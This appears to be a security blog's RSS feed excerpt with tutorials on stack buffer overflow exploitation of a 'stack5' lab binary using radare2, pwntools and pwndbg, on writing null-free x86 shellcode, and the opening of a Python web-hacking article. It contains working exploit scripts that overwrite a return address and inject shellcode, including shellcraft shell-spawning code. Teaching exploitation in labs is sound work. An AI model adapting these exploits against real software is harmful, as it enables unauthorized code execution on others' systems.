## **Practical Exploration: Creating a Test Payload**

Our first step is to construct a test payload that aligns with our theoretical plan, sans the shellcode. This payload aims to validate our understanding of the buffer overflow impact on the program&apos;s flow. The payload structure will be as follows:

-   **64 &apos;A&apos; Characters:** These serve as padding, filling up to the `ebp` (occupying the entire buffer variable).
-   **4 &apos;B&apos; Characters:** To overwrite the address of the previous `ebp`.
-   **4 &apos;C&apos; Characters:** Intended to replace the return address.

Here&apos;s the command to generate this payload in Python:

```bash
python3 -c &quot;print(&apos;A&apos;*64+&apos;B&apos;*4+&apos;C&apos;*4)&quot;

```
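The same 72-byte layout can be reproduced outside the shell one-liner. A minimal Python sketch that makes the three regions explicit (packing the return address little-endian, as on x86):

```python
# Build the 72-byte test payload: 64 bytes of padding over the buffer,
# 4 bytes over the saved ebp, then 4 bytes over the return address.
padding = b"A" * 64
saved_ebp = b"B" * 4
ret_addr = (0x43434343).to_bytes(4, "little")  # b"CCCC", little-endian

payload = padding + saved_ebp + ret_addr
print(len(payload))  # 72
```

Keeping the three regions as separate variables makes it obvious which bytes will land on which stack slot once `gets` copies the input.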

## **Injecting and Analyzing the Payload with Radare2**

With our payload ready, we&apos;ll use `radare2` to inject it into our vulnerable program and observe the stack&apos;s state. The following commands guide you through this process:

1.  Start `radare2` with the vulnerable program: `r2 ./stack5`
2.  Debug the program: `ood`
3.  Analyze the binary: `aaa`
4.  Inspect the main function&apos;s content: `pdf @dbg.main`
5.  Set a breakpoint after `gets`: `db &lt;address-after-gets&gt;`

![](/content/images/2023/06/image-1.png)

Payload insertion in the vulnerable program using radare2

## **Observing Stack Manipulation**

Upon executing the payload, we analyze the stack&apos;s status. The payload&apos;s impact is evident:

-   **Red Highlight:** Represents the top of the stack (`esp`).
-   **Green Highlight:** Indicates the memory address of the previous `ebp`, now overwritten with &apos;B&apos;s.
-   **Blue Highlight:** Marks the intended return address, now overwritten with &apos;C&apos;s.

![](/content/images/2023/06/image-2.png)

Registers with modified values

Advancing the code past the `ret` instruction reveals the altered program flow. The program, having its return address modified, is redirected to the address `0x43434343` (CCCC), confirming our successful manipulation of the program flow.

![](/content/images/2023/06/image-3.png)

Program flow change

# **Crafting the Exploit with Pwntools and Pwndbg**

Having established the groundwork, we now venture into creating the actual exploit using the `pwntools` library, a powerful toolkit for exploit development.

## **Initial Exploit Setup**

We begin by setting up the exploit&apos;s context and constructing the payload:

```python
from pwn import *

context.update(arch=&quot;i386&quot;, os=&quot;linux&quot;)
payload = cyclic(68) # Padding up to the return address
payload += p32(0xdeadbeef) # Placeholder return address, later replaced with the real stack address
p = process(&quot;./stack5&quot;)
p.sendline(payload)
p.interactive()

```

Introductory code to create the exploit

In this snippet:

1.  **Context Configuration:** We define the architecture as 32-bit (i386), suitable for our target exploit.
2.  **Payload Creation:** We use `cyclic` to generate a sequence that fills up to the return address. Then, we append an arbitrary memory address (`0xdeadbeef`) to manipulate the program flow. This address will later be updated with the actual stack top address.

![](/content/images/2023/06/image-4.png)

Sample of the &quot;cyclic&quot; utility

  

![](/content/images/2023/06/image-5.png)

Exploit execution 

## **Integrating Pwndbg for Deeper Analysis**

To further inspect the payload&apos;s impact, we integrate `pwndbg`, an enhancement of the GNU Debugger (GDB), which provides a more insightful view into the program&apos;s execution state.

```python
from pwn import *

context.update(arch=&quot;i386&quot;, os=&quot;linux&quot;)
context.terminal = [&quot;kitty&quot;, &quot;-e&quot;, &quot;sh&quot;, &quot;-c&quot;]
payload = cyclic(68) # Padding up to the return address
payload += p32(0xdeadbeef) # Placeholder return address, later replaced with the real stack address
p = process(&quot;./stack5&quot;)
gdb.attach(p, &apos;&apos;&apos;
           break *0x08049185
           continue
           &apos;&apos;&apos;)
p.sendline(payload)
p.interactive()

```

Exploit introducing the use of pwndbg

Here, we:

1.  **Set Up the Terminal:** Define the terminal for debugging (in this case, &quot;kitty&quot;).
2.  **Launch with GDB:** Attach the `pwndbg` to the process, setting a breakpoint after `gets` to pause execution and analyze the stack state.

## **Analyzing with Pwndbg**

Upon executing the exploit, `pwndbg` presents an interface for real-time debugging.

![](/content/images/2023/06/image-7.png)

Pwndbg interface

Using the command `telescope`, we examine the stack&apos;s state.

![](/content/images/2023/06/image-8.png)

Payload inserted in the stack

Key observations include:

-   The stack pointer (`esp`) and frame pointer (`ebp`) locations.
-   The injected memory address (`0xdeadbeef`), representing the manipulated return address.

### **Refining the Exploit**

With a clearer understanding of the stack&apos;s layout, we can adjust our exploit&apos;s injected memory address to the actual stack top address, in this case `0xffffca48`. This refinement ensures that upon return, the program flow redirects to our payload, setting the stage for the shellcode execution.

# **Injecting Shellcode: Displaying &quot;Hello World&quot;**

With a solid grasp of buffer overflow and padding concepts, we&apos;re now ready to inject our &quot;Hello World&quot; shellcode into the exploit. This critical step moves us closer to achieving command execution on the target machine.

## **Exploit Code with Shellcode Injection**

Here&apos;s the enhanced exploit code incorporating our shellcode:

```python
from pwn import *

# Memory randomization (ASLR) must be disabled
context.update(arch=&quot;i386&quot;, os=&quot;linux&quot;)
context.terminal = [&quot;kitty&quot;, &quot;-e&quot;, &quot;sh&quot;, &quot;-c&quot;]
shellcode = &quot;&quot;&quot;
    push 0x90646c72
    push 0x6f77206f
    push 0x6c6c6568
    push 4
    pop eax
    push 1
    pop ebx
    mov ecx, esp
    push 0xb
    pop edx
    int 0x80
&quot;&quot;&quot;


payload = asm(shellcode)
payload += cyclic(68 - len(asm(shellcode))) # Remaining padding up to the return address (40 bytes here)
payload += p32(0xffffca48)


p = process(&quot;./stack5&quot;)
gdb.attach(p, &apos;&apos;&apos;
           echo &quot;hi&quot;
           break *0x08049185
           continue
           &apos;&apos;&apos;)
p.sendline(payload)
p.interactive()

```

Exploit to print &quot;hello world&quot;

**Key Components of the Code:**

1.  **Shellcode Integration:** The shellcode designed to print &quot;Hello World&quot; is embedded into the payload.
2.  **Padding Calculation:** The payload is padded to ensure it reaches the return address, calculated as `68 - length of shellcode`.
3.  **Memory Address Injection:** The payload is appended with the specific memory address (`0xffffca48`) for redirecting the program flow.

## **Running the Exploit**

![](/content/images/2023/06/image-9.png)

Decomposition of the stack

On executing the exploit:

-   **Stack Inspection:** You&apos;ll observe the stack filled with the shellcode, padding, and the specified memory address.
-   **Hello World Display:** Executing the `continue` command in `pwndbg` should display &quot;Hello World&quot; on the screen, indicating successful shellcode execution.

![](/content/images/2023/06/image-10.png)

Sample of hello world

## **Analyzing Shellcode Execution**

For a deeper analysis:

-   Use the `step` command in `pwndbg` to trace the shellcode&apos;s execution step-by-step.
-   Observe how the program flow shifts due to the exploit, ensuring the shellcode runs as intended.

![](/content/images/2023/06/image-11.png)

Sample shellcode debugging

# **Leveraging Shellcraft for Advanced Shellcode Generation**

Pwntools offers a remarkable tool, `shellcraft`, designed to simplify the creation of various shellcodes, including those that enable shell access. This tool can generate shellcode for a multitude of purposes swiftly and efficiently.

## **Example: Generating a Shell-Access Shellcode**

Suppose we require a shellcode that grants us shell access. We can easily generate this using `shellcraft`:

```bash
shellcraft -f a i386.linux.sh

```

-   **Command Breakdown:** The `-f` flag specifies the output format. In this case, the value `a` indicates that we want the shellcode in assembly language.

![](/content/images/2023/06/image-13.png)

Shellcode from shellcraft

## **Integrating Shellcraft Shellcode into Our Exploit**

&lt;details&gt;
&lt;summary&gt;The generated shellcode can be seamlessly incorporated into our exploit code:&lt;/summary&gt;

```python
from pwn import *

# Memory randomization (ASLR) must be disabled
context.update(arch=&quot;i386&quot;, os=&quot;linux&quot;)
context.terminal = [&quot;kitty&quot;, &quot;-e&quot;, &quot;sh&quot;, &quot;-c&quot;]
shellcode = shellcraft.sh()

payload = asm(shellcode)
payload += cyclic(68 - len(asm(shellcode))) # Remaining padding up to the return address
payload += p32(0xffffca48)

p = process(&quot;./stack5&quot;)
gdb.attach(p, &apos;&apos;&apos;
           echo &quot;hi&quot;
           break *0x08049185
           continue
           &apos;&apos;&apos;)
p.sendline(payload)
p.interactive()

```
&lt;/details&gt;


Shellcode to create a shell

## **Execution Outcome**

After running the above exploit:

-   The stack is populated with the new shellcode.
-   On continuation, a shell is spawned (exit `pwndbg` to interact with it).

![](/content/images/2023/06/image-12.png)

Sample of shell achieved

## **Exploring Shellcraft&apos;s Versatility**

`Shellcraft` is not limited to just creating shells. It offers a wide range of functionalities, which can be explored using the `-l` parameter:

```bash
shellcraft -l
...
i386.linux.connect
i386.linux.egghunter
...

```

# **Mastering Shellcode Injection: From Concept to Execution**

In this comprehensive guide, we&apos;ve journeyed through the intricate process of shellcode injection, an essential component in exploiting code vulnerabilities. Beginning with understanding the vulnerable code and strategizing the exploit, we&apos;ve methodically navigated through changing the program flow, creating effective exploits, and finally, harnessing the power of the `shellcraft` tool from `pwntools`.

Key Takeaways:

1.  **Understanding Vulnerabilities:** We started by examining a typical buffer overflow scenario in a vulnerable program, setting the stage for our exploit development.
2.  **Crafting the Exploit:** Step by step, we constructed an exploit, first verifying our approach without shellcode and then incrementally adding complexity. This process included padding calculations and memory address manipulations to alter the program&apos;s execution flow.
3.  **Injecting Shellcode:** We then progressed to injecting a &quot;Hello World&quot; shellcode, demonstrating the exploit&apos;s capability to execute custom code.
4.  **Elevating with Shellcraft:** Finally, we explored `shellcraft`, a powerful feature of `pwntools`, which significantly simplifies the process of generating diverse shellcodes, including those that provide shell access.

**Impact and Implications:**

This article not only imparts technical know-how but also emphasizes the importance of understanding underlying vulnerabilities and the mechanics of exploits. It serves as a testament to the evolving landscape of cybersecurity, where knowledge of such techniques is vital for both offensive and defensive strategies in network security.

As we conclude, remember that the journey through shellcode injection is more than just about executing commands; it&apos;s about understanding the depth of vulnerabilities, the creativity in crafting exploits, and the continuous learning in the ever-changing field of cybersecurity.

# Tips of the article


&lt;details&gt;
&lt;summary&gt;What is the most classic strategy used for shellcode execution?&lt;/summary&gt;

Use an existing vulnerability in the code to change the value of the return address of a function to gain control of the flow and force shellcode execution.
&lt;/details&gt;

&lt;details&gt;
&lt;summary&gt;What technique can I use in conjunction with a debugger such as radare2 to identify where the return address is located?&lt;/summary&gt;

I can use padding made of letters whose hexadecimal translation I know so that, when radare2 halts execution, I can identify the 4 bytes that landed on the return address.
&lt;/details&gt;

&lt;details&gt;
&lt;summary&gt;What can we use together with pwntools to debug an exploit ? Of the latter, what function can I use to get an overview of the status of the stack?&lt;/summary&gt;

We can use GDB, specifically pwndbg. If we want to have a view of the status of the stack, we can use the `telescope` command.
&lt;/details&gt;

&lt;details&gt;
&lt;summary&gt;Which tool can I use to generate shellcodes? How can I display a shellcode in assembler with this tool ?&lt;/summary&gt;

I can use Shellcraft. To display a shellcode in assembler, I can use the following:

```bash
shellcraft -f a i386.linux.sh

```
&lt;/details&gt;</content:encoded><author>Ruben Santos</author></item><item><title>Shellcode Mastery: Crafting, Optimizing, and Debugging Assembler Code</title><link>https://www.kayssel.com/post/introduction-to-the-creation-of-shellcodes</link><guid isPermaLink="true">https://www.kayssel.com/post/introduction-to-the-creation-of-shellcodes</guid><description>&quot;Explore shellcode development: Learn assembler programming for creating efficient, compact shellcodes, avoid null character issues, and use diagnostic tools like radare2 and strace for effective troubleshooting</description><pubDate>Fri, 26 May 2023 12:26:04 GMT</pubDate><content:encoded># **Introduction: The Art and Science of Shellcode Development**

Welcome to an enlightening exploration into the world of shellcode development, a critical component in the realm of software exploitation and cybersecurity. This chapter is designed to guide you through the intricate process of creating, optimizing, and troubleshooting shellcode - the powerful strings of bytes that turn code vulnerabilities into opportunities for system control.

In this journey, we will:

1.  **Demystify Shellcode:** Start by understanding what shellcode is and its pivotal role in exploiting software vulnerabilities. We&apos;ll delve into how shellcodes function as conduits for executing commands on a target machine, potentially leading to access control or privilege escalation.
2.  **Assemble with Assembler:** Dive into the foundational aspects of shellcode creation using assembler programming. Learn how syscalls (system calls) work and how they are integral to shellcode functionality, setting the stage for your first hands-on experience in crafting a basic &quot;Hello World&quot; shellcode.
3.  **Focus on Efficiency:** Discover the importance of optimizing shellcode size. Learn why every byte matters and explore techniques to streamline your code, ensuring it fits within the constraints of the target program&apos;s buffer space.
4.  **Overcome Null Character Challenges:** Address a common hurdle in shellcode development - avoiding null characters that can prematurely terminate the shellcode execution. We&apos;ll discuss strategies to craft shellcode that is robust and uninterrupted.
5.  **Utilize Diagnostic Tools:** Equip yourself with powerful debugging tools like `radare2` and `strace`. These tools are invaluable in dissecting and understanding the behavior of your shellcode, helping you identify and resolve issues effectively.

By the end of this chapter, you will gain not just the technical know-how but also the analytical skills essential for proficient shellcode development. Whether you&apos;re a budding security enthusiast or an experienced penetration tester, this guide aims to enhance your understanding and capabilities in the fascinating world of shellcode. Let&apos;s embark on this journey of discovery and skill-building in the art of shellcode development.

# **Understanding Shellcodes**

At its core, a shellcode is a sequence of bytes injected into a program&apos;s memory due to a vulnerability. Its primary goal? To execute operating system commands, potentially granting the attacker access to or elevated privileges on the target machine. Shellcodes open a doorway to numerous possibilities, from simple command execution to complete system takeover.

While there are various methods to program a shellcode, we&apos;ll focus on the classical approach: using assembler. Though initially challenging, this method provides a solid foundation for understanding the underlying mechanics of shellcodes. In upcoming chapters, we&apos;ll explore different techniques for creating shellcodes and integrating them into exploits.

# **Syscalls: Direct Communication with the Operating System:**

Typically, a C program utilizes functions like `write` or `printf` from the libc library, which facilitates OS-level operations such as writing, reading, and executing programs. Shellcodes don&apos;t have this luxury: they aren&apos;t loaded into memory by the OS like a normal program, but injected as input into a vulnerable one. Thus, managing system calls (syscalls) falls upon us.

In the context of the x86 architecture, which we&apos;ll be focusing on, syscalls are made using the `int 0x80` instruction. While this may seem complex at first, practical examples in the following sections will clarify its usage and application.

# **Decoding Syscalls for Assembler Mastery**

As you embark on assembler programming, having a syscall cheat sheet is invaluable. One such resource is the comprehensive list of x86 syscalls, which can be found [here](https://chromium.googlesource.com/chromiumos/docs/+/master/constants/syscalls.md#x86-32_bit). For our &quot;Hello World&quot; program, the &apos;write&apos; syscall is our focus.

![img](/content/images/2023/05/2023-05-17_08-27-58_screenshot.png)

Syscalls with corresponding arguments

Here&apos;s a quick breakdown of how syscalls work with registers in assembler:

-   `eax` -&gt; Syscall number (0x04 for &apos;write&apos;)
-   `ebx` -&gt; First argument (File descriptor)
-   `ecx` -&gt; Second argument (String to print)
-   `edx` -&gt; Third argument (Number of characters)

Understanding this structure is crucial, as each syscall requires specific register values. You can get more details on these arguments by running `man 2 write` in the terminal.

![](/content/images/2023/05/image-12.png)

If you do not want to use the webpage, you can always see the different existing calls in the file `/usr/include/asm/unistd_32.h`:

```c
#ifndef _ASM_UNISTD_32_H
#define _ASM_UNISTD_32_H

#define __NR_restart_syscall 0
#define __NR_exit 1
#define __NR_fork 2
#define __NR_read 3
#define __NR_write 4

```

# **Continuing Our Assembler Journey: Crafting &quot;Hello World&quot;**

Following our exploration of syscalls and their roles in assembler programming, let&apos;s apply these concepts by programming a classic &quot;Hello World&quot; message. This exercise is not merely an introduction to programming; it serves as a foundational step towards mastering assembler and understanding how syscalls interact with system architecture.

### **Laying the Foundation in the Data Segment**

In the `.data` segment of our assembly code, we define a string named &quot;message&quot;. This string ends with a newline character (`0x0a`) rather than a null terminator, and it&apos;s here that we begin to put our syscall knowledge into practice.

```nasm
section .data                  ; DATA segment
message db &quot;Hello world&quot;, 0x0a

```

By initializing our &quot;Hello world&quot; message and appending a newline character (`0x0a`), we set up the text to be displayed correctly.

### **Setting Up the Execution in the Text Segment:**

Transitioning to the `.text` segment, we establish `_start` as our program&apos;s entry point. Here, the execution of our syscall sequence begins.

```nasm
section .text                  ; TEXT segment
  global _start                ; ELF entry point
  _start:
    ; syscall write(1, message, 12)
    mov eax, 4                 ; 4 = write, syscall number
    mov ebx, 1                 ; 1 = stdout, file descriptor
    mov ecx, message           ; message in ecx
    mov edx, 12                ; message length (&quot;Hello world\n&quot; = 12 bytes)
    int 0x80                   ; system call interrupt

```

This setup involves configuring the necessary registers for the `write` syscall, preparing our program to display the message.

### **Assembling and Linking the Code**

To transform our code into an executable format, we use the `nasm` assembler and `ld` linker:

```bash
nasm -f elf HelloWorld.asm
ld -m elf_i386 -o helloworld HelloWorld.o
./helloworld

```

![img](/content/images/2023/05/2023-05-18_08-46-16_screenshot.png)

Segmentation fault after running the executable (the program does not yet exit cleanly)

### **Properly Exiting with the Exit Syscall:**

To ensure a clean exit from our program, we implement the `exit` syscall, zeroing out the registers to set the stage for a graceful termination:

```nasm
xor    ebx,ebx              ; ebx = 0, status code
xor    eax,eax
mov    al,0x1               ; 1 = exit, syscall
int    0x80

```

Applying this `xor` technique to zero the registers is a common practice in shellcode creation, making it an essential skill in low-level programming.

![](/content/images/2023/05/image-10.png)

Sample assembler code

If we run the program, it should no longer show any segmentation fault errors.

&lt;details&gt;
&lt;summary&gt;Program code&lt;/summary&gt;

```nasm
section .data                  ; DATA segment
  message db &quot;Hello world&quot;, 0x0a

section .text                  ; TEXT segment
  global _start                ; ELF entry point

  _start:

  ; syscall write(1, message, 12)
    mov eax, 4                 ; 4 = write, syscall number
    mov ebx, 1                 ; 1 = stdout, file descriptor
    mov ecx, message           ; message in ecx
    mov edx, 12                ; message length (&quot;Hello world\n&quot; = 12 bytes)
    int 0x80                   ; system call interrupt

    xor    ebx,ebx              ; ebx = 0, status code
    xor    eax,eax
    mov    al,0x1               ; 1 = exit, syscall number
    int    0x80

```
&lt;/details&gt;


# **Transforming Assembler Code into Shellcode: A Practical Guide**

Transitioning from a basic assembler program to creating shellcode involves several critical modifications. Let&apos;s adapt our &quot;Hello World&quot; assembler code into a functional shellcode, focusing on the constraints and techniques unique to shellcode programming.

## **Navigating the Absence of the `.data` Section:**

In shellcode, the luxury of a `.data` section for defining variables is not available. This limitation requires us to find alternative methods to store and reference our desired string. A practical solution is to utilize the stack.

1.  **Storing Strings on the Stack:**
    -   We store the characters of our string in hexadecimal format directly onto the stack.
    -   It&apos;s crucial to use the little endian format to ensure the string is read correctly and not in reverse order.
2.  **Handling Odd-Length Strings:**
    -   In cases where the string length is odd, an extra byte is needed to align the stack.
    -   We use a &quot;NOP&quot; instruction (`0x90`) for this purpose, which effectively does nothing but helps in maintaining proper alignment.
3.  **Setting up the Stack Pointer:**
    -   The stack pointer (`esp`) is utilized to reference the top of the stack, where our string begins.

### **Graphical Overview of the Technique**

The diagram illustrates how we organize our string in the stack, emphasizing the little endian format.

![](/content/images/2023/05/image-14.png)

Diagram of stack usage for storing characters

## **Implementing the Write Syscall in Shellcode**

To execute the `write` syscall within our shellcode, we employ the following steps:

1.  **Preparing the Syscall:**
    -   Push the syscall number (`4` for `write`) and the file descriptor (`1` for stdout) onto the stack.
    -   Pop these values into the `eax` and `ebx` registers respectively, setting them up for the syscall.
2.  **Setting Up the Message and Length:**
    -   Move the stack pointer (`esp`) into `ecx`, pointing it to our message.
    -   Push and pop the message length into `edx`.
3.  **Executing the Syscall:**
    -   Trigger the syscall with `int 0x80`.

Here&apos;s the complete shellcode for the &quot;Hello World&quot; program, incorporating the discussed techniques:

```nasm
/* Hello World */
push 0x90646c72
push 0x6f77206f
push 0x6c6c6568
/* Write syscall */
push 4
pop eax
push 1
pop ebx
mov ecx, esp
push 0xb
pop edx
int 0x80

```

## **Crafting Shellcode: Avoiding Null Characters**

In shellcoding, a crucial consideration is the avoidance of null characters (`\x00`). These characters can prematurely terminate the shellcode, particularly when passed as strings to functions like `scanf`, where `\x00` signifies the end of the string. Let&apos;s explore how to craft shellcode while circumventing this pitfall.

### **The Challenge with Direct Register Loading:**

One might wonder why not directly load values into registers using instructions like `mov`. The issue here is that such instructions can generate machine code containing null characters. These nulls arise because if the data being moved is smaller than the register size, the remaining space is filled with zeros.

### **Demonstrating the Difference with Pwntools:**

Using the `asm` function from the `pwntools` library, we can compare the outputs of two shellcodes: one using `mov` and the other using stack operations.

```python
#!/usr/bin/env python3
from pwn import *

shellcode = &quot;&quot;&quot;
    push 0x90646c72
    push 0x6f77206f
    push 0x6c6c6568
    mov eax, 0x4
    mov ebx, 1
    mov ecx, esp
    mov edx, 0xb
    int 0x80
&quot;&quot;&quot;
shellcode_stack = &quot;&quot;&quot;
    push 0x90646c72
    push 0x6f77206f
    push 0x6c6c6568
    push 4
    pop eax
    push 1
    pop ebx
    mov ecx, esp
    push 0xb
    pop edx
    int 0x80
&quot;&quot;&quot;

print(asm(shellcode))
print(asm(shellcode_stack))

```

![](/content/images/2023/05/2023-05-23_08-17-34_screenshot.png)

Machine code of the shellcode

The first string shows the output from the shellcode using `mov`, revealing several null characters. The second string, which uses stack operations, is free from such nulls.
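The difference comes directly from the instruction encodings. Assuming standard 32-bit x86 machine code, `mov eax, 4` encodes the immediate as a full 32-bit value, while `push 4` uses a sign-extended 8-bit immediate:

```python
mov_eax_4 = bytes([0xB8, 0x04, 0x00, 0x00, 0x00])  # mov eax, 4
push_pop  = bytes([0x6A, 0x04, 0x58])              # push 4 ; pop eax

assert 0x00 in mov_eax_4      # null bytes would truncate the shellcode
assert 0x00 not in push_pop   # null-free, and two bytes shorter
```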

### **Addressing the Null Character Issue**

To avoid null characters, we can focus on moving the value into a specific part of the register. However, this approach can leave unknown values in the rest of the register. A common solution is to use the `xor` instruction to zero out the entire register first:

```nasm
xor eax, eax ; Zero out eax

```

This instruction doesn&apos;t contain `\x00` and can be safely used.

## **Streamlining Shellcode: Emphasizing Compactness**

Following our focus on null character avoidance in shellcode, the next critical aspect to consider is minimizing the shellcode&apos;s size. Ensuring our shellcode is compact enough to fit within the program&apos;s buffer is essential. Oversizing could trigger a &quot;Segmentation Fault,&quot; halting the execution. This section delves into optimizing shellcode size, ensuring it snugly fits within the allocated space without compromising functionality.

### **Balancing Efficiency with Size**

When it comes to shellcode, every byte counts. Let&apos;s take the example of setting the value `1` in the `eax` register:

1.  **Direct Assignment Approach:**
    -   A straightforward method like `mov eax, 1` is simple but may not be the most size-efficient.
2.  **Incremental Instruction Alternative:**
    -   Using `inc eax` is a more subtle approach. It increments `eax` by `1` and typically results in smaller machine code.

![](/content/images/2023/05/2023-05-24_08-31-01_screenshot-1.png)

Alternatives for entering 0x1 in eax

  
In the comparison, `inc eax` is likely to result in a smaller machine code footprint than `mov eax, 1`. This difference can be crucial when working with limited buffer sizes.
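Assuming standard 32-bit x86 encodings, the saving is easy to quantify: `mov eax, 1` takes five bytes, while zeroing the register with `xor` and incrementing takes three (and is also null-free):

```python
mov_eax_1 = bytes([0xB8, 0x01, 0x00, 0x00, 0x00])  # mov eax, 1 (5 bytes)
xor_inc   = bytes([0x31, 0xC0, 0x40])              # xor eax, eax ; inc eax (3 bytes)

assert len(mov_eax_1) == 5
assert len(xor_inc) == 3
```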

### **Strategies for Reducing Shellcode Size:**

To achieve the desired compactness in shellcode, consider the following strategies:

-   **Opt for Shorter Instructions:** Seek out instructions that accomplish the same task but with a reduced footprint.
-   **Utilize Register Defaults:** Make the most of the existing states of registers to minimize the need for explicit value assignments.
-   **Efficient Data Handling:** Arrange data in a manner that reduces the need for extensive immediate values.

# **Navigating Shellcode Development: Troubleshooting with Tools**

As we continue our journey in shellcode programming, it&apos;s essential to acknowledge that encountering errors is part of the process. Understanding and resolving these errors is key to successful shellcode development. To aid in this, there are invaluable tools that provide insight into what&apos;s happening under the hood of your code.

## **Leveraging radare2 for Dynamic Analysis:**

One such tool is `radare2`, which we&apos;ve previously explored for dynamic code analysis. It&apos;s particularly useful in shellcode development for inspecting real-time execution and monitoring register values. This feature is vital in understanding how your shellcode behaves at each step and identifying where things might be going awry.

Consider the example of our &quot;Hello World&quot; shellcode. Using `radare2`, we can step through each instruction and observe the changes in register values, ensuring that our code executes as intended.

The image above demonstrates `radare2` displaying the execution of the initial instructions of the &quot;Hello World&quot; shellcode, with visible updates in register values.

![](/content/images/2023/05/image-15.png)

Dynamic analysis of our code with radare2

**Utilizing strace for System Call Inspection:**

Another powerful tool in our arsenal is `strace`. This utility allows us to monitor the system calls made by our shellcode. By using `strace`, we can verify whether these calls are executed correctly, a crucial step in debugging shellcode.

In the following image, we see `strace` in action, detailing the system calls made by the shellcode:

![](/content/images/2023/05/image-17.png)

Study of syscalls with strace

Armed with `radare2` and `strace`, most errors encountered during shellcode development can be effectively diagnosed and resolved. In the next chapter of this series, we&apos;ll delve into another tool that aids in examining shellcode during runtime. As we progress, it&apos;s clear that a combination of carefully crafted code and adept use of these analytical tools is essential in mastering the art of shellcode development.

# **Conclusion: Mastering Shellcode Development – Tools and Techniques**

As we conclude this chapter on shellcode development, it&apos;s evident that crafting effective shellcode is a blend of meticulous programming and strategic troubleshooting. The journey through assembler programming, optimizing for size, avoiding null characters, and ensuring seamless execution underscores the nuanced nature of shellcode development.

Key takeaways from this exploration include:

1.  **Understanding Syscalls and Assembler:** Delving into syscalls and their implementation in assembler lays the foundation for shellcode programming. Crafting a simple &quot;Hello World&quot; program is an essential step in grasping these core concepts.
2.  **Optimizing for Compactness:** Size optimization is crucial in shellcode design. Techniques like choosing shorter instructions and efficient register usage are vital to ensure the shellcode fits within the target program’s buffer.
3.  **Navigating Null Character Pitfalls:** Avoiding null characters in shellcode is imperative to prevent premature termination. Techniques such as stack manipulation and careful register handling are key to circumventing this issue.
4.  **Leveraging Diagnostic Tools:** Tools like `radare2` and `strace` are invaluable for debugging and understanding shellcode behavior. They offer insights into execution flow and system call processes, aiding in the identification and resolution of errors.

As we advance in shellcode development, it becomes clear that the process is as much about problem-solving and analysis as it is about coding. The integration of these skills not only enhances the efficacy of the shellcode but also elevates the expertise of the developer. Looking ahead, we will explore additional tools and methods to further refine our shellcode, continuing our journey in the dynamic and challenging world of exploitation and security research.

# Tips of the article


&lt;details&gt;
&lt;summary&gt;Could you tell me in brief what is a shellcode ? What is its main use?&lt;/summary&gt;

A shellcode is nothing more than a string of bytes that will be attempted to be injected into the memory of a program as a result of the existence of a vulnerability. The usual purpose of a shellcode is to execute commands of the underlying operating system. If successful, it can cause the attacker to gain access to the machine on which the vulnerable program is running or escalate privileges on it, among many other options.
&lt;/details&gt;

&lt;details&gt;
&lt;summary&gt;What do we have to keep in mind about system calls and shellcodes?&lt;/summary&gt;

We have to keep in mind that we will be making the system calls ourselves, programming them directly in assembler, rather than relying on the operating system&apos;s libraries to perform tasks such as writing, reading or deleting files.
&lt;/details&gt;

&lt;details&gt;
&lt;summary&gt;What is the main feature that we will have to take into account when making use of system calls?&lt;/summary&gt;

Each system call is identified by an integer, which must be loaded into the &quot;eax&quot; register (on 32-bit x86) before invoking it.

![](/content/images/2023/09/image-29.png)
&lt;/details&gt;
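As a quick illustration of this convention, here is a tiny Python sketch. The numbers come from the 32-bit Linux syscall table (asm/unistd_32.h); the dictionary itself is just an illustrative aid, not part of any real tooling:

```python
# 32-bit Linux syscall numbers: the chosen number is what ends up in eax.
SYSCALLS = {"exit": 1, "write": 4, "execve": 11}

# A shellcode that spawns /bin/sh would load 11 into eax before int 0x80.
print(SYSCALLS["execve"])  # 11
```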

&lt;details&gt;
&lt;summary&gt;What three characteristics do we have to take into account when programming a shellcode?&lt;/summary&gt;

-   **A shellcode does not have a .data section**, so we have to avoid defining variables. Instead, we can use the stack to load values into registers and execute system calls.
-   We must avoid **&quot;null characters&quot;** (0x00), since they truncate the string of bytes and prevent our shellcode from being executed.
-   It has to fit in the space available in the target buffer.
&lt;/details&gt;
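Two of these three constraints can be checked mechanically before testing a payload. A minimal Python sketch (the helper function and the sample bytes are hypothetical, not a working payload):

```python
def check_shellcode(code, max_size):
    """Check the two classic constraints: no null bytes and it fits the buffer."""
    has_nulls = 0x00 in code
    fits = len(code) in range(max_size + 1)  # i.e. len(code) is at most max_size
    return (not has_nulls) and fits

# First bytes of a typical x86 "/bin/sh" stub: xor eax,eax; push eax; push "//sh"
stub = bytes([0x31, 0xC0, 0x50, 0x68, 0x2F, 0x2F, 0x73, 0x68])
print(check_shellcode(stub, 64))         # True: 8 bytes, no nulls
print(check_shellcode(b"\x31\x00", 64))  # False: contains a null byte
```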

# References

[Shellcode &amp; syscalls · Guía de exploits](https://fundacion-sadosky.github.io/guia-escritura-exploits/buffer-overflow/2-shellcode.html)

[GitHub - Gallopsled/pwntools: CTF framework and exploit development library](https://github.com/Gallopsled/pwntools)</content:encoded><author>Ruben Santos</author></item><item><title>Python for Web Hacking: Harnessing ipython3 and Building Custom Functionalities</title><link>https://www.kayssel.com/post/ipython3-for-web-pentesting</link><guid isPermaLink="true">https://www.kayssel.com/post/ipython3-for-web-pentesting</guid><description>Discover Python&apos;s power in hacking web apps: Learn ipython3 use, scripting for authorization tests and brute force attacks, and effective error troubleshooting with practical, hands-on examples</description><pubDate>Fri, 05 May 2023 17:12:23 GMT</pubDate><content:encoded># **Introduction: Python and Ipython3 - The Dynamic Duo in Web Hacking**

Welcome to the intriguing world of web application hacking, where Python and Ipython3 emerge as formidable allies. In this comprehensive guide, we delve into how these powerful tools can revolutionize your approach to hacking web applications. Whether you&apos;re a seasoned hacker or just starting, this article will equip you with the knowledge and skills to effectively utilize Python and Ipython3 in your cybersecurity endeavors.

Python, known for its simplicity and versatility, isn&apos;t just a tool for software development; it&apos;s also a hacker&apos;s secret weapon. Coupled with Ipython3, an interactive Python shell, it transforms into a robust platform for testing, analyzing, and exploiting web vulnerabilities.

In this journey, we&apos;ll explore:

1.  **Why Ipython3?** Understand the unique advantages of using Ipython3 in web hacking, from its interactive environment to its capability for real-time feedback and error handling.
2.  **Practical Applications:** We&apos;ll dive into practical use cases, demonstrating how Python and Ipython3 can be applied to real-world hacking scenarios. From testing authorization mechanisms to performing brute force attacks, these examples will showcase the practicality and effectiveness of these tools.
3.  **Enhancing Efficiency:** Learn how to harness Ipython3&apos;s features, like creating customized profiles and executing shell commands within Python scripts, to enhance your hacking efficiency and productivity.

Prepare to embark on a journey that will not only boost your web hacking skills but also broaden your understanding of how Python can be an invaluable asset in the cybersecurity toolkit.

